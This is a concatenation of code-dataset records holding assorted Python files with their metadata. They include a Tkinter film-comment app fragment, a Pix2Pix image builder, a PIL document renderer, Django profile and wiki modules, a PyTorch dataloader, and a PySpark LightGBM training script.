Label(display, text=username, font=(\"Gotham\", \"12\"))\n usernamelbl.place(x=x + 230, y=y + 200)\n\n contentlbl = Label(display, text=content, font=(\"Gotham\", \"12\"))\n contentlbl.place(x=x + 230, y=y + 240)\n\n datelbl = Label(display, text=date, font=(\"Gotham\", \"12\"))\n datelbl.place(x=x + 900, y=y + 200)\n\n def create_comment():\n content = entComment.get()\n f = open(\"localstorage.json\", \"r\")\n row = f.read()\n data = json.loads(row)\n\n today = date_module.today()\n now = datetime.now().time() # time object\n d1 = today.strftime(\"%d/%m/%Y\")\n d1 = str(d1)\n now = str(now)\n\n commentTable.create_comment(data[\"user_id\"], id, content, d1+\" \"+now )\n\n\n display = Frame(window, height = 700, width=1300, bg=\"GREEN\")\n display.place(x=0, y=0)\n baseX = 100\n baseY = 100\n\n back = Button(display, text=\"back\", font=(\"Gotham\", \"15\"), command=back)\n back.place(x=20, y=10)\n\n genres = Button(display, text=\"genres\", font=(\"Gotham\", \"15\"), command=open_genre_page)\n genres.place(x=100, y=10)\n\n film = films.get_exact_film(id)\n name = film[1]\n descr = film[2]\n rating = film[3]\n genre_id = film[4]\n photo = film[5]\n genre_title = film[6]\n\n namelbl = Label(display, text=name, font=(\"Gotham\", \"12\"))\n namelbl.place(x=330, y=110)\n\n descrlbl = Label(display, text=descr, font=(\"Gotham\", \"12\"))\n descrlbl.place(x=330, y=160)\n\n ratinglbl = Label(display, text=rating, font=(\"Gotham\", \"12\"))\n ratinglbl.place(x=800, y=110)\n\n genrelbl = Label(display, text=genre_title, font=(\"Gotham\", \"12\"))\n genrelbl.place(x=1000, y=110)\n\n write_file(photo, name + \".jpg\")\n image1 = Image.open(name + \".jpg\")\n image1 = image1.resize((180, 240), Image.ANTIALIAS)\n test = ImageTk.PhotoImage(image1)\n label1 = Label(display, image=test, width=180, height=240)\n label1.image = test\n label1.place(x=110, y=100)\n\n\n entComment = Entry(display, font=(\"Gotham\", \"12\"), width=50)\n entComment.place(x=330, y=200)\n\n btnCreate = Button(display, text=\"Create\", font=(\"Gotham\", \"12\"), command=create_comment)\n btnCreate.place(x=800, y=200)\n\n comments = commentTable.get_film_comment(id)\n for comment in comments:\n comment_id = comment[0]\n user_id = comment[1]\n film_id = comment[2]\n content = comment[3]\n date = comment[4]\n username = comment[5]\n show_comment(baseX, baseY, comment_id, user_id, film_id, content, date, username)\n baseY=baseY+80\n\n", "sub_path": "project/tkinterFilms.py", "file_name": "tkinterFilms.py", "file_ext": "py", "file_size_in_byte": 9286, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "db_init.genresTable", "line_number": 14, "usage_type": "argument"}, {"api_name": "tkinterCreate.create_genre_page", "line_number": 24, "usage_type": "call"}, {"api_name": "tkinterCreate.create_film_page", "line_number": 27, "usage_type": "call"}, {"api_name": "db_init.write_file", "line_number": 72, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 73, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 73, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 74, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 74, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 75, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 75, "usage_type": "name"}, {"api_name": "db_init.films", "line_number": 80, "usage_type": "name"}, {"api_name": "db_init.films", "line_number": 81, "usage_type": "name"}, {"api_name": "db_init.films.get_films_by_genre", "line_number": 109, "usage_type": "call"}, {"api_name": "db_init.films", "line_number": 109, "usage_type": "name"}, {"api_name": "db_init.genresTable", "line_number": 141, "usage_type": "argument"}, {"api_name": "db_init.films.get_films_by_genre", "line_number": 146, "usage_type": "call"}, {"api_name": "db_init.films", "line_number": 146, "usage_type": "name"}, {"api_name": "db_init.films.get_films_by_genre", "line_number": 151, "usage_type": "call"}, {"api_name": "db_init.films", "line_number": 151, "usage_type": "name"}, {"api_name": "db_init.write_file", "line_number": 185, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 186, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 186, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 187, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 187, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 188, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 188, "usage_type": "name"}, {"api_name": "db_init.films", "line_number": 193, "usage_type": "name"}, {"api_name": "db_init.films", "line_number": 194, "usage_type": "name"}, {"api_name": "db_init.genresTable", "line_number": 211, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 227, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 229, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 229, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 230, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 230, "usage_type": "name"}, {"api_name": "db_init.commentTable.create_comment", "line_number": 235, "usage_type": "call"}, {"api_name": "db_init.commentTable", "line_number": 235, "usage_type": "name"}, {"api_name": "db_init.films.get_exact_film", "line_number": 249, "usage_type": "call"}, {"api_name": "db_init.films", "line_number": 249, "usage_type": "name"}, {"api_name": "db_init.write_file", "line_number": 269, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 270, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 270, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 271, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 271, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 272, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 272, "usage_type": "name"}, {"api_name": "db_init.commentTable.get_film_comment", "line_number": 284, "usage_type": "call"}, {"api_name": "db_init.commentTable", "line_number": 284, "usage_type": "name"}]} +{"seq_id": "187658095", "text": "from skimage import io\nimport numpy as np\nimport cv2\nimport os, sys\nfrom PIL import Image\nimport shutil\n\ninput_path = r\"D:\\WorkSpace\\Pix2Pix\\data\\test\\original\"\noutput_path = r\"D:\\WorkSpace\\Pix2Pix\\data\\test\\test\"\n\nimages = [os.path.join(input_path, img) for img in os.listdir(input_path)]\ntarget_width = target_height = 600\n\ndef inference_image_builder(image, output_path, target_width=600, target_height=600):\n print(f\"Processing {image} >>>\")\n output_img = os.path.join(output_path, image.split('\\\\')[-1])\n image = Image.open(image)\n image = image.resize((target_height, target_width))\n target_image = Image.open(\"inf_zero.png\")\n images = [image, target_image]\n\n new_image = Image.new('RGB', (2*target_height, target_width))\n x_offset = 0\n for im in images:\n new_image.paste(im, (x_offset, 0))\n x_offset+= im.size[0]\n new_image.save(output_img)\n\nfor i in images:\n inference_image_builder(i, output_path)", "sub_path": "GAN/GAN_inference_data_builder.py", "file_name": "GAN_inference_data_builder.py", "file_ext": "py", "file_size_in_byte": 953, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 17, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 17, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 19, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 19, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 22, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "297591044", "text": "import os\nfrom string import whitespace as whitespace_\n\nfrom PIL import Image as Image_, ImageDraw, ImageFont\n\nwhitespace = whitespace_.replace(' ', '')\n\n\nclass Text(object):\n def __init__(self, text=None, center=False, font=None, spacing=1.0):\n self.font = self.size = None\n self.spacing = spacing\n self.is_center = center\n self.text = '' if (text is None) else text\n if font is not None:\n self.set_font(font)\n\n def right_strip(self, line):\n if line != '':\n while line[-1:] == ' ':\n line = line[:-1]\n return line\n\n def left_strip(self, line):\n if line != '':\n while line[0] == ' ':\n line = line[1:]\n return line\n\n def set_font(self, font_path):\n assert os.path.exists(font_path) and os.path.isfile(font_path)\n self.font = font_path\n\n def section(self, line, index):\n line1 = line[:index]\n line2 = line[index:]\n el = line1[-1:]\n s_el = '' if line2 == '' else line2[0]\n if el != ' ' and s_el != ' ':\n i = line1.rfind(' ')\n if i >= 0:\n line2 = line1[i:] + line2\n line1 = line1[:i]\n line1 = self.right_strip(line1)\n line2 = self.left_strip(line2)\n return (line1, line2)\n\n def echo(self, image, draw, position, left, right):\n x, before_y = position\n y = before_y\n\n size = 13 if self.size is None else self.size\n font = ImageFont.truetype(self.font, size) if self.font is not None \\\n else ImageFont.load_default()\n\n max_width = right - left\n lines = self.text.split('\\n')\n lines.reverse()\n while len(lines) > 0:\n line = lines.pop()\n width, height = font.getsize(line)\n if width > max_width:\n section = int(len(line) * (max_width * 1.0 / width + 0.05))\n # +5% на всякий случай - в случае наличия спец. символов,\n # которые не будут отображаться\n while True:\n (line1, line2) = self.section(line, section)\n width_1, height = font.getsize(line1)\n if width_1 <= max_width:\n width = width_1\n break\n sec = line1.rfind(' ')\n if sec < 0:\n sec = section - 1\n section = sec\n\n line = line1\n lines.append(line2)\n\n x1 = x if not self.is_center else x + int((max_width - width) / 2)\n draw.text((x1, y), line, fill='black', font=font)\n y += int(self.spacing * height)\n return y - before_y\n\n def draw(self, draw, x, y, text, font):\n xy = (x, y)\n draw.text(xy, text, fill='black', font=font)\n\n\nclass Image(object):\n def __init__(self, path=None, fixed=True):\n if path is not None:\n self.set_path(path)\n self.fixed = fixed\n\n def set_path(self, path):\n assert os.path.exists(path) and os.path.isfile(path)\n self.path = path\n\n def draw(self, left, right):\n img = Image_.open(self.path, 'r')\n if not self.fixed:\n old_width, old_height = img.size\n width = right - left\n height = int(old_height * width / old_width)\n img = img.resize((width, height), Image_.BICUBIC)\n return img\n\n def echo(self, image, draw, position, left, right):\n x, y = position\n img = self.draw(left, right)\n image.paste(img, (x, y), img)\n w, h = img.size\n return h\n\n\nclass TableColumn(object):\n def __init__(self, per_sent=None):\n self.persent = per_sent\n self.rows = []\n self.reset()\n\n def __getitem__(self, index):\n return self.rows[index]\n\n def __setitem__(self, key, value):\n assert isinstance(value, Image) or isinstance(value, Text) \\\n or isinstance(value, Table)\n self.rows[key] = value\n\n def __iter__(self):\n return iter(self.rows)\n\n def add_elems(self, val=1):\n while val > 0:\n self.rows.append(None)\n val -= 1\n\n def reset(self):\n self.index = 0\n\n def __next__(self):\n try:\n el = self[self.index]\n except IndexError:\n return None\n self.index += 1\n return el\n\n def is_full(self):\n return not len(self.rows) > self.index\n\n\nclass Table(object):\n def __init__(self, cols=None, rows=None):\n self.cols = []\n if cols is not None:\n self.add_col(cols)\n if rows is not None:\n self.add_row(rows)\n\n def add_row(self, val=None):\n for row in self.cols:\n row.add_elems(val)\n\n def add_col(self, val=None):\n v = val if val is not None else 1\n assert isinstance(v, int)\n while v > 0:\n v -= 1\n self.cols.append(TableColumn())\n\n def __setitem__(self, key, value):\n self.cols[key] = value\n\n def __getitem__(self, key):\n return self.cols[key]\n\n def check_persent(self):\n all_ = 0.0\n with_none = 0\n for col in self.cols:\n if col.persent is None:\n #all_ = -1\n #break\n with_none += 1\n else:\n all_ += col.persent\n if with_none > 0:\n abs_ = (100.0 - all_) / with_none\n for col in self.cols:\n if col.persent is None:\n col.persent = abs_\n return True\n elif all_ != 100.0:\n self.cols[len(self.cols) - 1].persent += 100.0 - all_\n return True\n return False\n\n #def draw(self, x, y, left, right):\n def echo(self, image, draw, position, left, right):\n self.check_persent()\n\n width = right - left\n x, table_y = position\n y = table_y\n for col in self.cols:\n col.reset()\n\n while not self.is_full_():\n h = 0\n l = r = left\n n_x = x\n for col in self.cols:\n r += int(col.persent * width / 100.0)\n el = next(col)\n if el is not None:\n pos = (n_x, y)\n new_h = el.echo(image, draw, pos, l, r)\n h = new_h if new_h > h else h\n n_x += r - l\n l = r\n y += h\n\n return table_y - y\n\n def is_full_(self):\n return (len(self.cols) == 0) or self.cols[0].is_full()\n\n\nclass Document(object):\n A4 = (2481, 3507)\n\n def __init__(self, background=None, padding_left=0, padding_right=0):\n self.background = background\n self.left = padding_left\n self.right = padding_right\n self.objs = []\n\n def add_object(self, position, obj):\n self.objs.append((position, obj))\n\n def draw(self, filename):\n frame = Image_.open(self.background) if self.background is not None \\\n else Image_.new('RGB', self.A4)\n draw = ImageDraw.Draw(frame)\n width, height = frame.size\n l = self.left\n r = width - self.right\n for pos, obj in self.objs:\n obj.echo(frame, draw, pos, l, r)\n # import ipdb; ipdb.set_trace()\n frame.save(filename, 'png')\n", "sub_path": "libs/create_docs/objectpng.py", "file_name": "objectpng.py", "file_ext": "py", "file_size_in_byte": 7430, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "string.whitespace.replace", "line_number": 6, "usage_type": "call"}, {"api_name": "string.whitespace", "line_number": 6, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 31, "usage_type": "call"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 53, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 53, "usage_type": "name"}, {"api_name": "PIL.ImageFont.load_default", "line_number": 54, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 54, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 97, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 101, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 101, "usage_type": "name"}, {"api_name": "PIL.Image.BICUBIC", "line_number": 106, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 106, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 244, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 244, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 245, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 245, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 246, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 246, "usage_type": "name"}]} +{"seq_id": "413255673", "text": "from PIL import Image\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom django.utils.translation import gettext as _\nfrom django.db.models.signals import post_save\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nclass Profile(models.Model):\n user = models.OneToOneField(\n User,\n on_delete=models.CASCADE\n )\n image = models.ImageField(\n _('Profile Picture'),\n default='default.png',\n upload_to='profile_pics',\n help_text=_('Designates the users Profile picture.')\n )\n address_line1 = models.CharField(\n _('Address line 1'),\n max_length=100,\n help_text=_('Designates the users Address line1.')\n )\n address_line2 = models.CharField(\n _('Address line 2'),\n max_length=100,\n help_text=_('Designates the users Address line 2.')\n )\n pincode = models.CharField(\n _('Pincode'),\n max_length=6,\n help_text=_('Designates the users PINCODE.')\n )\n contactno = models.CharField(max_length=10,default=1234567890)\n\n def __str__(self):\n return f'{self.user.username}'\n def get_username(self):\n return self.user.username\n def get_email(self):\n return self.user.email\n def get_fullname(self):\n return self.user.get_full_name()\n\n def save(self,*args,**kwargs):\n super().save(*args,**kwargs)\n img=Image.open(self.image.path)\n if img.height>300 or img.width >300 :\n output_size=(300,300)\n img.thumbnail(output_size)\n img.save(self.image.path)\n\n# #Signals part can be used alternatively for signals.py\n# def create_profile(sender, instance, created, **kwargs):\n# if created:\n# Profile.objects.create(user=instance)\n# # print(\"Create_profile function executed!\")\n#\n# def save_profile(sender, instance, **kwargs):\n# instance.profile.save()\n# # print(\"Save_profile function executed!\")\n#\n# post_save.connect(create_profile,sender=User)\n# post_save.connect(save_profile,sender=User)\n", "sub_path": "users/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 2342, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.db.models.Model", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 10, "usage_type": "name"}, {"api_name": "django.db.models.OneToOneField", "line_number": 11, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 12, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 11, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 13, "usage_type": "name"}, {"api_name": "django.db.models.ImageField", "line_number": 15, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 15, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext", "line_number": 16, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 21, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 21, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext", "line_number": 22, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 24, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 26, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext", "line_number": 27, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 31, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 31, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext", "line_number": 32, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext", "line_number": 34, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 36, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 36, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 49, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 49, "usage_type": "name"}]} +{"seq_id": "56712542", "text": "from configs import (train_path101, test_path101)\nfrom utils import get_data101 as get_data\nfrom PIL import Image\nfrom torch.utils.data import (Dataset, DataLoader)\nfrom dataloader import (rand_transform101, train_args, test_args)\nimport random\nimport torch\nimport numpy as np\n\nclass HotDogDataset(Dataset):\n \"\"\"Face Landmarks dataset.\"\"\"\n\n def __init__(self, datalist, transform=None):\n \"\"\"\n :param transform:TRANSFORMATION FOR DATA_AUGMENTATION\n \"\"\"\n self.datalist = datalist\n self.transform = transform\n\n def __len__(self):\n return len(self.datalist)\n\n def __getitem__(self, idx):\n path, label = self.datalist[idx]\n image = Image.open(path)\n while np.array(image).shape[-1] != 3:\n path, label = random.sample(self.datalist, 1)[0]\n image = Image.open(path)\n sample = {'image': image}\n if self.transform:\n sample['image'] = self.transform(sample['image'])\n sample.update({'label': torch.tensor(label)})\n return sample\n\n\nclass HotDogDataSetLoader(object):\n def __init__(self):\n self.train_list = get_data(train_path101)\n self.test_list = get_data(test_path101)\n self.transform = rand_transform101\n\n self.trainsets = HotDogDataset(self.train_list, transform=rand_transform101)\n self.testsets = HotDogDataset(self.test_list, transform=rand_transform101)\n\n def random(self):\n random.shuffle(self.train_list)\n random.shuffle(self.test_list)\n\n self.trainsets = HotDogDataset(self.train_list, transform=rand_transform101)\n self.testsets = HotDogDataset(self.test_list, transform=rand_transform101)\n\n def train_test(self):\n self.random()\n return DataLoader(self.trainsets, **train_args), DataLoader(self.testsets, **test_args)\n\n def train(self):\n self.random()\n return DataLoader(self.trainsets, **train_args)\n\n def test(self):\n self.random()\n return DataLoader(self.testsets, **test_args)", "sub_path": "assign3_convolution_nn/dataloader/food101smallloader.py", "file_name": "food101smallloader.py", "file_ext": "py", "file_size_in_byte": 2038, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 10, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 25, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 25, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 26, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 27, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 28, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.tensor", "line_number": 32, "usage_type": "call"}, {"api_name": "utils.get_data101", "line_number": 38, "usage_type": "call"}, {"api_name": "configs.train_path101", "line_number": 38, "usage_type": "argument"}, {"api_name": "utils.get_data101", "line_number": 39, "usage_type": "call"}, {"api_name": "configs.test_path101", "line_number": 39, "usage_type": "argument"}, {"api_name": "dataloader.rand_transform101", "line_number": 40, "usage_type": "name"}, {"api_name": "dataloader.rand_transform101", "line_number": 42, "usage_type": "name"}, {"api_name": "dataloader.rand_transform101", "line_number": 43, "usage_type": "name"}, {"api_name": "random.shuffle", "line_number": 46, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 47, "usage_type": "call"}, {"api_name": "dataloader.rand_transform101", "line_number": 49, "usage_type": "name"}, {"api_name": "dataloader.rand_transform101", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 54, "usage_type": "call"}, {"api_name": "dataloader.train_args", "line_number": 54, "usage_type": "name"}, {"api_name": "dataloader.test_args", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 58, "usage_type": "call"}, {"api_name": "dataloader.train_args", "line_number": 58, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 62, "usage_type": "call"}, {"api_name": "dataloader.test_args", "line_number": 62, "usage_type": "name"}]} +{"seq_id": "22614457", "text": "#coding=utf-8\nfrom newtest.wiki.models import Wiki\nfrom django.template import loader, Context\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render_to_response\n\ndef index(request, pagename=\"\"):\n \"\"\"显示正常页面,对页面的文字做特殊的链接处理\"\"\"\n if pagename:\n #查找是否已经存在页面\n# pages = Wiki.objects.get_list(pagename__exact=pagename)\n pages = Wiki.objects.filter(pagename=pagename)\n if pages:\n #存在则调用页面模板进行显示\n return process('wiki/page.html', pages[0])\n else:\n #不存在则进入编辑画面\n return render_to_response('wiki/edit.html', {'pagename':pagename})\n \n else:\n# page = Wiki.objects.get_object(pagename__exact='FrontPage')\n page = Wiki.objects.get(pagename='FrontPage')\n return process('wiki/page.html', page)\n \ndef edit(request, pagename):\n \"\"\"显示编辑存在页面\"\"\"\n# page = Wiki.objects.get_object(pagename__exact=pagename)\n page = Wiki.objects.get(pagename=pagename)\n return render_to_response('wiki/edit.html', {'pagename':pagename, 'content':page.content})\n\ndef save(request, pagename):\n \"\"\"保存页面内容,老页面进行内容替换,新页面生成新记录\"\"\"\n content = request.POST['content']\n# pages = Wiki.objects.get_list(pagename__exact=pagename)\n pages = Wiki.objects.filter(pagename=pagename)\n if pages:\n pages[0].content = content\n pages[0].save()\n else:\n page = Wiki(pagename=pagename, content=content)\n page.save()\n return HttpResponseRedirect(\"/wiki/%s\" % pagename)\n\nimport re\n\nr = re.compile(r'\\b(([A-Z]+[a-z]+){2,})\\b')\ndef process(template, page):\n \"\"\"处理页面链接,并且将回车符转为
\"\"\"\n t = loader.get_template(template)\n content = r.sub(r'\\1', page.content)\n content = re.sub(r'[\\n\\r]+', '
', content)\n c = Context({'pagename':page.pagename, 'content':content})\n return HttpResponse(t.render(c))", "sub_path": "very_old_code/django_step_by_step/newtest/newtest/wiki/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2088, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "newtest.wiki.models.Wiki.objects.filter", "line_number": 12, "usage_type": "call"}, {"api_name": "newtest.wiki.models.Wiki.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "newtest.wiki.models.Wiki", "line_number": 12, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 18, "usage_type": "call"}, {"api_name": "newtest.wiki.models.Wiki.objects.get", "line_number": 22, "usage_type": "call"}, {"api_name": "newtest.wiki.models.Wiki.objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "newtest.wiki.models.Wiki", "line_number": 22, "usage_type": "name"}, {"api_name": "newtest.wiki.models.Wiki.objects.get", "line_number": 28, "usage_type": "call"}, {"api_name": "newtest.wiki.models.Wiki.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "newtest.wiki.models.Wiki", "line_number": 28, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 29, "usage_type": "call"}, {"api_name": "newtest.wiki.models.Wiki.objects.filter", "line_number": 35, "usage_type": "call"}, {"api_name": "newtest.wiki.models.Wiki.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "newtest.wiki.models.Wiki", "line_number": 35, "usage_type": "name"}, {"api_name": "newtest.wiki.models.Wiki", "line_number": 40, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 42, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 46, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 49, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 49, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 51, "usage_type": "call"}, {"api_name": "django.template.Context", "line_number": 52, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "218972778", "text": "from pyspark.sql import SparkSession\nfrom src.parser.csv_parser import load_as_df\nfrom src.schema.twitter_schema import twitter_schema\nfrom src.preprocess.preprocessor import shape_df\nfrom src.featurizer.word2vec_featurizer import Word2VecFeaturizer\nfrom src.utils.predager_config import predager_config\nfrom pyspark.ml.evaluation import MulticlassClassificationEvaluator\n\nif __name__ == '__main__':\n\n print('chinge')\n spark = SparkSession.builder.appName(\"MyApp\") \\\n .config(\"spark.jars.packages\", \"com.microsoft.ml.spark:mmlspark_2.11:1.0.0-rc3\") \\\n .config(\"spark.jars.repositories\", \"https://mmlspark.azureedge.net/maven\") \\\n .getOrCreate()\n print('hanage')\n from mmlspark.lightgbm import LightGBMClassifier\n print('munage')\n model = LightGBMClassifier(baggingSeed=1024,\n learningRate=0.01,\n numIterations=1000,\n maxBin=8,\n numLeaves=8,\n metric='auc')\n print('mimige')\n\n # Load training data\n # dataPath = '../../data/twitter/20190528sentences_data_integrated.csv'\n dataPath = predager_config.exp.lightGbm.dataPath\n df = load_as_df(dataPath, twitter_schema)\n converted_df = shape_df(spark, df).drop(\"age\")\n converted_df.show(3)\n # model_path = \"../../param/word2vec/entity_vector/entity_vector.model.bin\"\n # wv = Word2VecFeaturizer(spark, model_path)\n # feat_df = wv.featurize(converted_df)\n model_path = predager_config.exp.lightGbm.modelPath\n wv_tweet = Word2VecFeaturizer(spark, model_path, False)\n feat_df = wv_tweet.featurize(converted_df)\n # model_path = \"../../param/bert/Japanese_L-24_H-1024_A-16_E-30_BPE_WWM_transformers\"\n # bert = BertFeaturizer(spark, model_path)\n # Split the data into training and test sets (30% held out for testing)\n # multi_feat = MultiFeaturizer(spark, [wv, wv_tweet])\n # feat_df = multi_feat.featurize(converted_df)\n # converted_df2 = shape_df(spark, df, 'nagisa', ['補助記号']).drop(\"age\")\n # tfidf = TfidfFeaturizer(spark)\n # feat_df = tfidf.featurize(converted_df2)\n # onehot = OneHotFeaturizer(spark)\n # feat_df = onehot.featurize(converted_df)\n # multi_feat = MultiFeaturizer(spark, [wv_tweet, tfidf], [converted_df, converted_df2])\n # feat_df = multi_feat.featurize()\n (trainingData, testData) = feat_df.randomSplit([0.8, 0.2], seed=3)\n # 3. call `fit`. (fit のときにはたんに事前に作った data-frame を入れる)\n clf = model.fit(trainingData)\n\n predict_train = model.transform(trainingData)\n predict_test = model.transform(testData)\n\n # Select (prediction, true label) and compute test error\n evaluator = MulticlassClassificationEvaluator(\n labelCol=\"label\", predictionCol=\"prediction\", metricName=\"accuracy\")\n accuracy = evaluator.evaluate(predict_train)\n print(\"train accuracy: \" + str(accuracy))\n\n\n\n # Select (prediction, true label) and compute test error\n evaluator = MulticlassClassificationEvaluator(\n labelCol=\"label\", predictionCol=\"prediction\", metricName=\"accuracy\")\n accuracy = evaluator.evaluate(predict_test)\n print(\"test accuracy: \" + str(accuracy))", "sub_path": "src/models/classification/lightgbm_classifier.py", "file_name": "lightgbm_classifier.py", "file_ext": "py", "file_size_in_byte": 3246, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pyspark.sql.SparkSession.builder.appName", "line_number": 12, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 12, "usage_type": "name"}, {"api_name": "mmlspark.lightgbm.LightGBMClassifier", "line_number": 19, "usage_type": "call"}, {"api_name": "src.utils.predager_config.predager_config.exp", "line_number": 29, "usage_type": "attribute"}, {"api_name": "src.utils.predager_config.predager_config", "line_number": 29, "usage_type": "name"}, {"api_name": "src.parser.csv_parser.load_as_df", "line_number": 30, "usage_type": "call"}, {"api_name": 